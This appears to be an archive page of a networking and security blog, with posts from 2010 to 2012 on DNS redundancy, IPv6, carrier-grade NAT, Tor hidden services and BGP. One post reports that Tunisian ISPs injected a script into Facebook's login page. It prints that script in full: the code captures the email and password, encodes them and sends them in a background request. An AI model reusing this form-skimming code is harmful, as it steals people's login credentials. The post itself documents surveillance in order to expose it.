Tag Archives: Internet

GoDaddy Outage: RFC for Dummies

September 11, 2012 07:58 | 10 Comments |

MoïseYesterday was a black day for GoDaddy.com. During a few hours all they hosting services were interrupted. Mail, websites but, worse, all the DNS services were unavailable. The outage was caused by a member of Anonymous as said on Twitter but it’s not yet clear. Personally, who’s behind the attack, I don’t care! Results were the same: millions of websites remained unreachable during hours. Other people started to blame GoDaddy and to exort customers to move to another provider. Do you really think other companies would resist to a massive DDoS attack? I don’t!

Let’s leave this apart and focus on the consequences. Lot of websites were simple not reachable because the hostnames could not be resolved. Wait? When  I connected for the first time to the Internet (and – trust me – I’m here for a while!), everybody told me that this super-network was derived from a military project. The goal was to build an super-strong meshed network being able to resist to almost any attack from the “enemies”. Today, we are in 2012 and millions of sites are affected by a “simple” attack! Is there a problem somewhere?

Are people entitled to complain against GoDaddy for not providing the services they subscribed to? Is moving quickly to an alternate provider the best choice? I don’t think so. My idea is that Internet became today a real media like any other one and people tend to forget the complexity that exists behind nice websites with beautiful interfaces and plenty of features. Internet (read: “the set of all protocols used to build the Internet“) relies on RFC’s (“Request For Comments“). Those documents are memorandum published by the IETF (“Internet Engineering Task Force“) and describe how to build a working Internet. As a developer, manufacturer or designer, those RFC’s must be seen as golden rules for you!

Back to the GoDaddy story! There is a very interesting RFC2182 with the title: “Selection and Operation of Secondary DNS Servers“. If you read it (please do!), you will find best practices to define secondary DNS servers for your domain(s). How many do you require? How to deploy them? Let’s take a simple example: digitalz.org. This domain is hosted by GoDaddy:

$ dig digitalz.org ns

; <<>> DiG 9.8.1-P1 <<>> digitalz.org ns
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20319
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;digitalz.org. IN NS

;; ANSWER SECTION:
digitalz.org. 3600 IN NS ns13.domaincontrol.com.
digitalz.org. 3600 IN NS ns14.domaincontrol.com.

;; Query time: 68 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Sep 11 08:30:25 2012
;; MSG SIZE rcvd: 85

But if you look at the two registered nameservers (ns13 & ns14):

$ host ns13.domaincontrol.com.
ns13.domaincontrol.com has address 216.69.185.7
ns13.domaincontrol.com has IPv6 address 2607:f208:206::7
$ host ns14.domaincontrol.com.
ns14.domaincontrol.com has address 208.109.255.7
ns14.domaincontrol.com has IPv6 address 2607:f208:302::7

Both are part of the same backbone belonging to GoDaddy:

NetRange: 216.69.128.0 - 216.69.191.255
CIDR: 216.69.128.0/18
OriginAS:
NetName: GO-DADDY-COM-LLC
NetHandle: NET-216-69-128-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
RegDate: 2004-05-24
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-216-69-128-0-1
NetRange: 208.109.0.0 - 208.109.255.255
CIDR: 208.109.0.0/16
OriginAS:
NetName: GO-DADDY-COM-LLC
NetHandle: NET-208-109-0-0-1
Parent: NET-208-0-0-0-0
NetType: Direct Allocation
RegDate: 2006-04-12
Updated: 2012-02-24
Ref: http://whois.arin.net/rest/net/NET-208-109-0-0-1

Finally, have a look at the BGP routes to access those IP ranges: They are announced via the same path (AS-26496)

BGP routing table entry for 208.109.255.0/24, version 111874851
Paths: (5 available, best #2, table Default-IP-Routing-Table)
Multipath: eBGP iBGP
  Advertised to update-groups:
     3         
  26496
    195.69.144.26 (metric 20) from 195.26.4.255 (195.26.4.255)
      Origin IGP, metric 1000, localpref 100, valid, internal
      Community: 5577:2000 5577:2100 5577:2103 5577:5000 5577:5002
      Originator: 195.26.4.133, Cluster list: 0.0.0.2
  26496
    195.69.144.26 (metric 20) from 195.26.4.254 (195.26.4.254)
      Origin IGP, metric 1000, localpref 100, valid, internal, best
      Community: 5577:2000 5577:2100 5577:2103 5577:5000 5577:5002
      Originator: 195.26.4.133, Cluster list: 0.0.0.1
  46786 26496
    199.59.206.17 from 199.59.206.17 (204.26.60.249)
      Origin IGP, localpref 100, valid, external
      Community: 5577:2000 5577:2100 5577:2150 5577:2199 5577:5000 5577:5001
  46786 26496
    199.59.206.29 from 199.59.206.29 (204.26.60.249)
      Origin IGP, localpref 100, valid, external
      Community: 5577:2000 5577:2100 5577:2150 5577:2199 5577:5000 5577:5001
  3549 26496
    208.178.63.97 from 208.178.63.97 (67.17.80.136)
      Origin IGP, metric 100, localpref 49, valid, external
      Community: 3549:4698 3549:31528 5577:1000 5577:1001 5577:5000 5577:5001

As you can imagine, any issue with this BGP autonomous system would have huge impacts on the services (being multi-homed would not solve all the problems). There are plenty of nightmare stories about BGP issues. In this case, best practices are to use multiple DNS servers spread geographically (ex: one on each continent) and connected to multiple backbones totally independant. In other words: Don’t put all your eggs in the same basket! Always keep in mind that RFC’s are your best friends. Follow and implement them to increase the availability of your online services.

Outages like the one of GoDaddy are always good opportunities to remind best practices. We learn by doing mistakes!

Posted in: Net | Tagged: , , , ,

You Just Have Been Erased! Are You Sure?

July 18, 2012 17:23 | Leave a Comment |

MiB NeuralizerThis is a never-ending story! People will never realize that once data has been published online, it is a nightmare to try to remove it. Here is another example…

In parallel to this blog, I’m playing with another website called leakedin.com. The purpose is to educate people about the huge amount of data that can be posted on the Internet without their prior consent, by mistake or, worse, wittingly! The website compiles interesting data collected from paste websites using my tool pastemon. Everything is automated and some content can be grabbed just before being removed by the website maintainers (pastebin.com looks more and more aggressive on this point). I completely agree on the fact that some content might be offensive for some people. That’s why my website proposes an abuse page to report such content. When something is reported, the content is immediately removed. My goal is not to offense people! A few days ago I received this message:

From: xxxxx@xxxxx.xxx
Subject: please remove ASAP!

My Social Security # is on your website in 2 different locations. It originated on pastebin and has since been deleted from their website. Please remove both links from Leakedin.com.

http://www.leakedin.com/2012/05/04/xxxxxx


http://www.leakedin.com/2012/05/04/yyyyyy

Thanks,
xxxxxx xxxxx

A few hours later, the content was removed and I notified the person with a standard reply. Then, a second message came in:

From: xxxxx@xxxxx.xxx
Subject: Re: please remove ASAP!

Thanks for deleting 2 links with my SS# (see below) but I still see it when googling my name "xxxxx". Please help!!
Thank you,

LeakedIn » Blog Archive » Potential leak of data: US SSN
www.leakedin.com/2012/05/04/xxxxx/
May 4, 2012 - J 08213 xxxxx xxx xxxxx xxx xxxxx MS xxx xx/xx/xxxx xxx-xx-xxxx xx/xx/xxxx xxx-xx-xxxx xxxxx xxxxx xxx

LeakedIn » Blog Archive » Potential leak of data: US SSN
www.leakedin.com/2012/05/04/xxxxx/
May 4, 2012 - ... xxxx xxxx xxxx xx xxxxx xx/xx/xxxx xxx-xx-xxxx xxxxx xxxxx xxxxx xxxx xxxx xx xxxxx xx/xx/xxxx xxx-xx-xxxx ...

Ok, ok, how to answer in a comprehensive and polite way? We are not in a Holliwood movie, there is no way to rollback in the past and forget what happened using a neuralizer! There is no “format” nor “delete” button on the Internet. I won’t say it’s impossible to get rid of all your private data. There are even companies which sell their services to build you a brand clean online profile (against lot of $$$).

This example was based on private data related to one person. I let you imagine when a company looses thousands of records or publishes by accident condifential data. Such incidents occur every day. The correct title for this article should be “You just have been… indexed!“.

Posted in: Net, Privacy, Security | Tagged: , ,

Biology Rules Apply to Infosec?

November 9, 2011 14:44 | Leave a Comment |

(Source: www.esa.org)

In biology, it is proven that consanguinity between members belonging to the same group (example: people living in the same closed area or animals from the same breed) may affect their resistance to certain diseases or reduce certain physical characteristics. It’s important to keep some level of diversity. The latest Juniper story made me remember the talk about “monoculture” presented at BlackHat Europe 2011.

A few days ago, some parts of the Internet were affected by a bug in Juniper routers BGP update code. If you have a look at the market of the core-routers, it is dominated by two manufacturers: Cisco & Juniper. Routers operated by major ISPs are crucial to maintain the Internet reliable. If most of those devices are coming from a unique manufacturer (or a very limited number of them), you increase the risks to face big issues if they are affected by a bug or a security flaw.

Now, speaking about devices or applications in general (the core-routers were just an example) and from a business point of view, monoculture is positive:

  • You can negotiate better prices (more items you buy, more discount you receive),
  • You can easily negotiate with other resellers,
  • You find plenty of engineers with the enough knowledge or external consultants,
  • Your engineers don’t need multiple skills and certifications,
  • Plenty of on-line resources may help you,
  • You get some nice goodies from the manufacturers.

But, putting the layer-8 (the “political layer“) aside, monoculture has side effects:

  • Big players offer a very large attack surface to hackers (They will select the most deployed targets),
  • Manufacturers don’t have time to re-invent the wheel and different products may re-use the same (vulnerable) piece of code,
  • Big players might be slower to react to vulnerabilities,
  • Big players might be less motivated for changes,
  • Your vision of the market is restricted.

Like in biology, monoculture can generate catastrophic situations in case of a successful attack or major bug. I don’t say that big players do a bad job (otherwise they could never reach such part of the market). Just don’t behave like a lemming. Choose the solution which match your requirements and not just because “it’s a big name“.

Do you remember the French movie “Les Rivières Pourpre” (“The Crimson Rivers“) with the closed society of Guernon?

 

Posted in: Net, Security | Tagged: , , ,

We Survived the World IPv6 Day!

June 9, 2011 17:00 | Leave a Comment |
I survived

(Source: makemymood.com)

… and the first World IPv6 Day! This first major event to promote the version  six of the IP protocol looks to be a success for most of companies. For most users, it was completely transparent as network administrators prepared all the required stuff on the background. Maybe you were lucky IPv6 users!

I quickly setup a SmokePing server to monitor the availability of IPv6 sites. I configured and tested ~100 IPv6 websites during 2 days.

Almost all companies which participated to the worldwide test were reachable except some which blocked all incoming ICMP traffic. Some respected strictly the defined time window (like Google – see below), others extended the tests.

Google IPv6 Response Time

(Click to enlarge)

From my own experience, during the 24-hours period, 3.04% of the HTTP requests on this blog where transported over IPv6! This is not bad compared to the regular traffic (less than 1%). On the other side, the content of mainly oriented to technical people who were ready to play with IPv6. I’m not sure that a blog about gardening or biking would generate the same amount of traffic. As you can see, there was a increase of the incoming traffic:

IPv6 Bandwidth

(Click to enlarge)

What’s next? I would like to get rid of my tunnel as soon as possible. It is definitively unstable and increase the latency. To achieve this, I’m waiting for a good news from my hosting company. They promise native IPv6 for months now! Otherwise, let’s keep the pressure and don’t fall asleep. We need to move to IPv6 as soon as possible! Remember: “There is no place like ::1“.

Posted in: Event, IPv6, ISP, Net | Tagged: , ,

Ready for the World IPv6 Day?

June 6, 2011 21:10 | 1 Comment |

Ready? Go!Next Wednesday will be the 1st World IPv6 Day! Are you ready? What are you plans? Unfortunately, I’ll be visiting a customer but I’ll try to grab some popcorn, coke and to keep an eye on the Internet. The goal is simple: Make a maximum of web sites and online services available through IPv6 during 24 hours.

All operating systems today are dual-stacked, they work with IPv4 and IPv6. On local networks, IPv6 addresses are automatically assigned, maybe your laptop or desktop already has such address, did you already check? Recent operating systems give more priority to IPv6. If a website URL resolves to an “AAAA” record, it will be used. Hélas, today, most websites do not enable (yet) quad-A records for their main URL, they prefer alternatives. A well-known example is Google, available via ipv6.google.com. During the IPv6 day, the main URL (“www.google.com“) will be available via IPv4 and IPv6 at the same time. Just like my blog:

  $ host blog.rootshell.be
  blog.rootshell.be has address 88.191.119.130
  blog.rootshell.be has IPv6 address 2001:5c0:1400:b::9349

Due to the higher priority of IPv6, your browser will use this address. Then problems may occur… And that’s the purpose of this event. Detect issues and fix them!

Unfortunately, the Internet is often managed by the (in)famous “layer 8‘. IMHO, I think that biggest commercial websites won’t play the game. The risk of loosing revenues will take over the technology aspects. According the different mailing lists or forums that I’m following, this event could be renamed as the “World Geek IPv6 Day“. Indeed, most people who will participate are technical guys (network & system administrators). Where are the managers amongst us? From a technical point of view, lot of people are deploying reverse proxies connected with IPv6 and processing internal request to the “old” IPv4 servers.

I setup a SmokePing server which monitors a bunch of IPv6 websites participating to the event:

SmokePing
(Click to enlarge)

It runs on IPv6 only and will also help to me to stress test my home IPv6 tunnel (I don’t expect native IPv6 to be delivered by my ISP before 20xx!). I hope to gather interesting statistics during the day. Due to lack of bandwidth, I can’t make it available publicly but I’ll share interesting statistics after the event.

Another nice initiatives:

  • The RIPE developed a “World IPv6 Day Connectivity Chart” (available here).
  • Eric Vyncke’s IPv6 deployment status.

And finally, a special mention on the wall of shame to Microsoft which released a fix to change the priority of IP stacks before and after the event:

The following Fix it solution will resolve the issue by configuring your computer to prefer IPv4, instead of IPv6. By default, Windows prefers IPv6 over IPv4. This Fix it solution is temporary, to resolve issues on World IPv6 Day for affected Internet users. On June 10, 2011 at 12:00AM, your computer will be configured to prefer IPv6 again after your next reboot.

From my point of view, if your workstation is so critical in your business, do you really need an Internet access? The World IPv6 day will be a great opportunity to test IPv6 live. Don’t miss it!

Finally, during the day, Twitter will be a good source of information. Follow the hashtag “#WorldIPv6Day“.

Posted in: Event, IPv6, Net | Tagged: , ,

Carrier Grade NAT VS IPv6

April 1, 2011 08:56 | 4 Comments |

Problem BackstageYesterday I went to a cocktail organized by ISPA, the Belgian Internet Service Providers Association. I worked several years for ISP’s and I trying to keep in touch with them to gather interesting information about market trends. The topic of the event was “IPv6” (what a surprise!).

Eric Vyncke, CTO of the IPv6 Forum, presented a keynote and, one more time, invited ISP’s to deploy as soon as possible IPv6. Compared to other European countries, Belgium is far behind! It was also a good opportunity to perform some good networking. While listening to some conversations, I learned that some ISP’s have plans to deploy “Carrier Grade NAT” (CGN) as a transition to IPv6. What???

The main problem for ISP’s is not their backbone and networking devices (all manufacturers are IPv6 ready for years) but the Triple-Play boxes massively deployed in their customers premises! The idea behind CGN is to assign private IP addresses to customers and perform NAT at the ISP level. With this technique, multiple customers might be hidden behind a single public IP address:

Carrier Grade NAT
Carrier Grade NAT Example

From a technical point of view, there is no difference between Carrier Grade NAT and regular NAT. The goal is to assign private IP addresses to “internal” hosts (assigned following the RFC1918) and “translate” them in public IP addresses which are routable in the Internet. In the case of CGN, this translation is performed by the ISP at the edge of its backbone just before reaching the wild Internet. As IP addresses for residential customers are already assigned dynamically, it’s tempting to use this technique instead of immediately jumping into the IPv6 train. It looks interesting… not so!

First, my point of view as a customer. I’m paying my subscription to have a FULL Internet connectivity. I’m paying for an open pipe to the Internet, I don’t want to be limited in any way. Today, most ISP’s already filter critical ports like SMTP(25), HTTP(80) “for my own security“…  But I’m using VPN’s and other services to connect back to my home network. If ISP’s implement Carrier Grade NAT, forget this! No more incoming connections will be allowed from the Internet to your home. Online services which implement rate-limit for the usage of their resources are also based on IP addresses. Try to use Google Hacking without splitting your requests across multiple proxies and you will be quickly banned: Google will authorize new requests only after resolving a CAPTCHA. Twitter is also a well known service to limit the number of requests to their API. If multiple customers are now connected to the Internet behind the same IP address, there are more risks to be blocked by services implementing a poor user detection.

From a commercial point of view, how will ISP’s deal with customers still in need for a valid public IP address? Will they split their offers and propose both solutions? There are risks that subscriptions with a “good” IP address will be more expensive. I call this discrimination! Sorry to be rough!

From a business point of view, some services like online advertisement will suffer of this solution. How will Google be able to correctly analyze people behavior and display relevant ads if multiple people use the same IP address? From the same IP, people will visit fishing, technology or football websites. It will become a headache to display the right ads! Conclusion: risks of loss of revenue.

Finally, and maybe the worst case, from a legal point of view. Imagine a suspicious activity detected against a website. After investigations, the offending public IP address has been extracted from logs. Who’s behind this IP address? How many customers? According to data retention laws, ISP’s must keep trace of IP communications. Helas, most ISP’s do not log the source port of all communications. Without this information, it will be impossible to track the user at the source.

Dear ISP’s, come on, it’s time to wake up and deploy IPv6 NOW!

 

Posted in: IPv6, ISP, Net | Tagged: , , ,

Escaping Censure with Tor Hidden Services

March 30, 2011 19:54 | Leave a Comment |

Tor NetworkTor aka “The Onion Router” is a well known network running on top of the regular Internet. It protects the confidentiality of communications between users and regular online services. As the multiple layers of an onion, Tor is a worldwide decentralized network based on layers. When you need to connect to a remote site, your packets enter the Tor network and are routed to the final destination across several  nodes which just relay the traffic anonymously. As explained on the website:

Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.

From an authority point of view (your boss, your country or who cares), there are several ways to implement blacklists. Examples:

  • Using DNS redirection
  • Using IP addresses blacklists
  • Using Deep Packet Inspection

The first technique consists in redirecting hostnames to a new IP addresses via DNS. This method was already used once in Belgium in 2009 to prevent Belgian citizens to access a controversial website. This is completely irrelevant as websites are still available using their IP address(es) and people using open DNS resolvers like Google or OpenDNS will still be able to access the blacklisted resources. Or,if you are part of a international organization, they are chances that you use global resources localized in a foreign country.

The next technique, blacklists based on IP addresses, is also useless. This was proven during the “Wikileaks story”. The website was replicated on multiple locations. Those techniques are more a “cat & mouse” game between the prohibited resources owner and the authorities.

Finally, the DPI or “Deep Packet Inspection” perform filtering at another level. Instead of using the packet headers (where are located information like source and destination IP addresses and ports), DPI analyzes the payload of packets to detect prohibited content or applications (read: at layer 7 of the OSI model). You could, by example, prevent packets containing words like pedo“, “twitter“, “revolution” or “Tibet” (Dear Chinese authorities, if you read this, a big hello from Belgium! ;-) ) .  Deep Packet Inspection becomes common in organizations to protect them against data loss or data leakage or to prevent users to waste their time/Internet connectivity. But it remains extremely difficult to implement and maintain at the ISP level for reasons of performance!

Even if you use Tor, access to some resources might be prohibited if the output node is connected to an ISP which implemented such controls. That’s why Tor developers implemented the “Hidden Services“! Once you joined the Tor network (as a client or a relay), you can offer such services (a web site, a SSH gateway or SMTP relay) which remain in Tor. Once your packets entered the network, they won’t go out. Basically, you will configure some kind of reverse proxy. In your torrc file, add some configuration lines like the example below:

  ### This section is just for location-hidden services ###
  HiddenServiceDir /home/tor/hidden_service/
  HiddenServicePort 80 127.0.0.1:8080

Restart your Tor and two files will be created in the directory defined above: a private key (keep it safe!) and a “hostname” file which contains your assigned URL. Something like: r1sgytddkyjudx7.onion. This is your “public” hostname (but restricted to the Tor network) that you can communicate to your contacts. More information is available here.

This is a very convenient way to publish online services or data without being blocked by regular controls. Of course, Tor Hidden Services can also be used for malicious activities or to share prohibited contain. But it is another debate!

If you are looking for hidden services on the Tor network, there is even a search engine called “Duck Duck Go“. Available at the following address: http://3g2upl4pq6kufc4m.onion/:

Duck Duck Go Screenshot

(Click to enlarge)

Posted in: ISP, Net, Software | Tagged: , , ,

No, the Internet will not Colapse…

January 25, 2011 22:59 | 1 Comment |

Oh-NoIn May 2008, I wrote a blog post about IPv6 (Will Finally IPv6 Arise?) with a date: 2011. We reached the deadline foreseen and it’s now official: IANA is running out of IP addresses. IANA (“Internet Assigned Numbers Authority“) is the organization responsible of the assignments of IP addresses to the different LIR’s (“Local Internet Registries“). An an example, for the countries in Europe, Middle East and Asia, the RIPE (“Réseaux IP Européens“) is responsible for the IP addresses assignments to Internet Services Providers. IP addresses are assigned by IANA by /8 subnets or 255.0.0.0 (by blocks of 16.777.216 IPs). The LIR split them in smaller subnets and assign them to ISP’s or companies (such IP addresses are called “PI” or “Provider Independent“). Finally ISP’s assign them to the final customers, they are called “PA” or “Provider Assigned“.

Does it mean that Internet will collapse soon? Certainly not. The fact that the whole IP addresses  scope has been assigned  to LIR’s does not mean that they are all in use now. For a while, IP addresses are assigned to ISP’s and organizations using strong procedures and criterias. The time is over when you could assign a static IP address to all your internal hosts. Wake up! Some estimations are based on mathematical models and predict that all IP addresses will be assigned soon (somewhere in 2012). Even if all IP addresses will be assigned, I don’t think that it will have a huge impact on the Internet. Big ISP’s already made some sort of “stock”. A well-known Belgian ISP will only deploy IPv6 in 2012 and 2013. “IPv6″, this is the solution to the problem. This new protocol exists since 1988 when the RFC2460 was published (not so new!) and is designated for years to replace the old version 4. I will not come back on the differences between these protocols, there are plenty of sites which will do this better than me. Google is your best friend!

So why does it take so long to implement it? This could be resumed in one word: “procrastination

“In psychology, procrastination refers to the act of replacing high-priority actions or tasks with low-priority actions, and thus putting off important tasks to a later time.” (Source: wikipedia.org)

For the end-user, IPv6 will not extend the capabilities of the Internet. Your applications will remain the same. The best example is that the transition will be fully transparent to you! Maybe are you still using IPv6 to visit this blog. But for the Internet Service Providers, the manufacturers and developers, things are different. All devices and applications must be “IPv6″ ready and this could have several impacts.

From a financial point of view, companies will have to put some money on the table:

  • to upgrade their network infrastructure (routers, switches, firewalls, etc).
  • to upgrade their applications.
  • to train the network team.

But without any real “business” plus-value and due to the crisis, all projects that can be postponed are frozen. From a technical point of view, organizations are not permitted to fail their migration to IPv6. It could be better to plan carefully all the migration, perform intensive tests in lab. Finally, from a security point of view (and lot the least one), IPv6 will for sure bring new threats. A nice example is the lack of filtering on IPv6 traffic via firewalls. Today, lot of tunnels are established to provide IPv6 connectivity thru IPv4 via services like SixXS or Go6. Traffic exchanged in those tunnels is not often inspected. But there are also potential security issues directly related to the IPv6 protocol like the PMTU discovery process.

2011 promises to be a “hot” year on the Internet scene. If your company does not have plans to support IPv6, I suggest you to perform some awareness. My own plans are: speaking about IPv6 to customers,  colleagues and to migrate my servers to a native IPv6 connectivity instead of a tunnel.

Related sites:

Posted in: ISP, Net | Tagged: , , , , ,

Tunisia Tracks Users with JavaScript Injection?

January 13, 2011 17:06 | 2 Comments |

Code InjectionDisclaimer: The information reported below has been translated from French to English with the approval of a friend who also released the information on his blog. His server was hit by a DoS attack. Feel free to relay the information!

When you try to access big websites like Facebook, Google or Yahoo! while connected to a Tunisian ISP, here is the code your browser will receive (for Facebook in the example below):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" id="facebook">
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="fr" />
<script type="text/javascript">
//<![CDATA[
CavalryLogger=false;window._is_quickling_index="";window._EagleEyeSeed="w6jw";
//]]>
</script><noscript> <meta http-equiv=refresh content="0; URL=/?_fb_noscript=1" /> </noscript>

<meta name="robots" content="noodp,noydir" />
<meta name="description" content=" Facebook est un réseau social qui vous relie à des amis, des collègues de travail, des camarades de classe ou d’autres personnes qui ont quelque chose à partager avec vous. Grâce à Facebook, vous pourrez rester en contact avec vos amis, charger un nombre illimité de photos, publier des liens et des vidéos… et faire plus ample connaissance avec les personnes que vous rencontrez." />
<link rel="alternate" media="handheld" href="http://www.facebook.com/" />
<title>Bienvenue sur Facebook</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript>
    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y6/r/TVhzFSu8Tm2.css" />

    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y-/r/zbLi6FTnPZj.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yN/r/Uuokrl6Xv3c.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/rUdGGxe1Qk1.css" />

    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y7/r/5875srnzL-I.ico" /></head>
<body>
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div><div><div><a href="/" title="Accéder à la page d&#039;accueil"><img src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Logo de Facebook" width="170" height="36" /></a><div><div><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="hAAAQ3d()" onsubmit="return Event.__inlineSubmit(this,event)"><div style="position:absolute;top:-250px"><img id="x6y7z8" src=""/></div>
<script language="javascript">
<!--
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
 var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
 var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//-->

</script><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="AOL9y" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="fr_FR" autocomplete="off" /><table cellspacing="0"><tr><td><label for="email">Adresse électronique</label></td><td><label for="pass">Mot de passe</label></td></tr><tr><td><input type="text" name="email" id="email" tabindex="1" /></td><td><input type="password" name="pass" id="pass" tabindex="2" /></td><td><label><input value="Connexion" tabindex="4" type="submit" /></label></td></tr><tr><td><input type="checkbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">Garder ma session active</label></td><td><a href="http://www.facebook.com/reset.php" rel="nofollow">Mot de passe oublié ?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="AOL9y" autocomplete="off" /></form>
</div></div></div></div><div><div><div><div>Facebook vous permet de rester en contact et d'échanger avec les personnes qui vous entourent.</div><div>&nbsp;</div></div><div><div><div><div>Inscription</div><div>C’est gratuit (et ça le restera toujours)</div></div><div id="registration_container"><div><noscript><div id="no_js_box"><h2>JavaScript est désactivé dans votre navigateur.</h2><p>Veuillez activer JavaScript dans votre navigateur ou installer un navigateur avec JavaScript pour pouvoir vous enregistrer sur Facebook.</p></div></noscript><div id="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return

The most interesting code is the following:

<!--
function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
 var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
 var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//-->

The code is injected when you try to access the website. It has been successfully tested from a proxy server located in Tunisia. This code generates a new query which looks like:

http://www.facebook.com/wo0dh3ad?q=blablablabla&u=USERNAME&p=PASSWORD

This is a fake page and the user will receive a nice “404″ error. But its credentials are sent in clear text. So easy to collect with another tool and build a nice list of poor users!

Other examples are available here:

Related sites:

Posted in: ISP, Net, People / Places, Privacy | Tagged: , , , ,

Is BGP the Next Threat on Internet?

November 18, 2010 22:03 | 2 Comments |

BGP for Dummies When Internet ARPAnet was invented in the seventies, its goal was to interconnect military resources using packets based networks and to be strong enough to resist to “attacks”. Loosing some devices in the network could not affect the communications. Later, the same technology was re-used to build the public network that you still use today to read to article: the Internet!

But the networks becoming more and more interconnected and complex, it was mandatory to develop protocols to dynamically route all of them. There are many routing protocols  like RIP, OSPF and… BGP!

I’ll not fully explain the BGP (“Border Gateway Protocol“) protocol here, I’m definitely not a BGP expert but I played a lot with it when I worked for Internet providers.  To resume in a few words: Internet will not exist without BGP! When you want to visit a web site, BGP decides through which pipes send your data. Its current version is 4 (since 2006) and it is documented in RFC4271. BGP is used to exchange groups of routes (or IP addresses prefixes) via autonomous systems (“AS“).

A report written by a commission on United States – Chinese relation has been released to the U.S. Congress a few days ago. The document reports an incident detected in April. During a few (18!) minutes, some Chinese ISP’s hijacked  Internet traffic from the Internet. The consequences were lot of unreachable sites and services and (worse!) big security consequences in terms of confidentiality. But wait… Internet has though been designed to resist to attacks… Did I miss something?

In fact, BGP is just a protocol and potentially vulnerable to attacks. Counter-measures exists but are not always used by network administrators. The purpose of BGP is to exchange messages between “peers” (routers). Very simply, messages can be of types “Please note that to reach the network 1.2.3.4, you need to pass by me!” or “How do I reach network 6.7.8.9?“. All those peers are building a unique routing table which contains the complete Internet address space. For your information, the table size is constantly growing:

BGP Routing Table

(Source: http://bgp.potaroo.net/)

Two Internet providers which decide to establish a BGP session set up a “peering agreement”. The peers are supposed to be trusted. A minimal configuration looks like:

  # ISP1
  router bgp 1
  neighbor 10.20.30.40 remote-as 2

  # ISP2
  router bgp 2
  neighbor 6.7.8.9 remote-as 1

But, we are not in 2006 anymore, can we trust our peers? All BGP sessions are established between peers via a TCP session (on port 179). This is a first issue: all known attacks available at the layer 4 can be used against BGP: Sessions reset, flood (DDoS), MitM, etc. But more attacks can be conducted at the upper layers: injection of malicious prefixes is a common issue. The goals can be multiple:

  • Blackholing – the victim is “disconnected” from the Internet.
  • Redirection – the victim’s traffic is redirected to a malicious network.
  • Routing instability (or “dampening“) – BGP has mechanism to detect unstable routes and can results in network outages (like blackholing).

